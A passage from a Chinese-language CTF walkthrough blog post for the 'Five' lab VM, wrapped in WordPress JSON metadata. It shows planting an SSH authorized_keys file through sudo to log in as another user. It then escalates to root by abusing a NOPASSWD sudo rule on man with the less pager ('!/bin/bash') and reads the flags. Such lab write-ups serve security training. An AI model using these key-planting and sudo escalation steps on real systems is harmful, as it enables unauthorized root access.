authorized_keys\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/tmp\/authorized_keys \/home\/melisa\/.ssh\/authorized_keys\n(remote) www-data@five:\/tmp$ ssh melisa@127.0.0.1 -p 4444 -i melisa \nCould not create directory &#039;\/var\/www\/.ssh&#039;.\nThe authenticity of host &#039;[127.0.0.1]:4444 ([127.0.0.1]:4444)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.\nAre you sure you want to continue connecting (yes\/no)? yes\nFailed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).\nLinux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Oct  6 03:39:32 2020 from 192.168.1.58\nmelisa@five:~$ <\/code><\/pre>\n<p>\u6210\u529f\u767b\u5f55\uff01<\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<p>\u5148\u4fe1\u606f\u641c\u96c6<\/p>\n<pre><code class=\"language-bash\">melisa@five:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 melisa melisa 4096 Oct  6  2020 .\ndrwxr-xr-x 3 root   root   4096 Oct  5  2020 ..\n-rw-r--r-- 1 melisa melisa  220 Oct  5  2020 .bash_logout\n-rw-r--r-- 1 melisa melisa 3526 Oct  5  2020 .bashrc\n-rw------- 1 melisa melisa   72 Oct  5  2020 .lesshst\ndrwxr-xr-x 3 melisa melisa 4096 Oct  5  2020 .local\n-rw-r--r-- 1 melisa melisa  807 Oct  5  2020 .profile\ndrwx------ 2 melisa melisa 4096 Oct  6  2020 .ssh\n-rw------- 1 melisa melisa   14 Oct  5  2020 user.txt\n-rw------- 1 melisa melisa  100 Oct  6  2020 .Xauthority\nmelisa@five:~$ cat user.txt \nIlovebinaries\nmelisa@five:~$ sudo -l\nMatching Defaults entries for melisa on five:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser melisa may run the following commands on five:\n    (ALL) SETENV: NOPASSWD: \/bin\/pwd, \/bin\/arch, \/bin\/man, \/bin\/id, \/bin\/rm, \/bin\/clear<\/code><\/pre>\n<p>\u8fd9\u4e48\u591asudo\u6587\u4ef6\uff0c\u7a33\u4e86\uff0c\u90fd\u7a33\u4e86\uff01\uff01<\/p>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/man\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/man\/#sudo<\/a><\/p>\n<p>\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821907.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821907.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421181124703\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u65e0\u6cd5\u8f93\u5165\u547d\u4ee4\u3002\u3002\u3002\u4f46\u662f\u518dkali\u4e2d\u662f\u53ef\u4ee5\u6267\u884c\u7684\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821908.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821908.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421181402648\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6839\u636e\u5927\u4f6c\u6307\u70b9\u4ee5\u540e\u77e5\u9053\u8fd9\u662f\u56e0\u4e3a\u5206\u9875\u6a21\u5f0f\u4e0d\u540c\uff0c\u4f7f\u7528less\u5206\u9875\u5c06\u9614\u4ee5\u76f4\u63a5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<pre><code class=\"language-bash\">melisa@five:~$ sudo \/bin\/man man -P \/bin\/less\n\/bin\/man: -P-\/bin\/less: No such file or directory\n\/bin\/man: -P_\/bin\/less: No such file or directory\nNo manual entry for -P\n--Man-- next: less(1) [ view (return) | skip (Ctrl-D) | quit (Ctrl-C) ]\n!\/bin\/bash\nmelisa@five:~$ sudo \/bin\/man -P \/usr\/bin\/less \/bin\/man\nroot@five:\/home\/melisa# cd \/root\nroot@five:~# ls -la\ntotal 32\ndrwx------  3 root root 4096 Oct  7  2020 .\ndrwxr-xr-x 18 root root 4096 Oct  5  2020 ..\n-rw-------  1 root root  101 Oct  7  2020 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\n-rw-------  1 root root   59 Oct  5  2020 .lesshst\ndrwxr-xr-x  3 root root 4096 Oct  5  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   14 Oct  5  2020 root.txt\nroot@five:~# cat root.txt \nWTFGivemefiv<\/code><\/pre>\n<p>\u5b66\u5230\u4e86\uff0c\u65b0\u59ff\u52bf\uff01\uff01\uff01\uff01lol\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Five \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.188 &#8212; -A Open 192 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-600","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=600"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600\/revisions"}],"predecessor-version":[{"id":601,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600\/revisions\/601"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=600"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=600"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=600"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}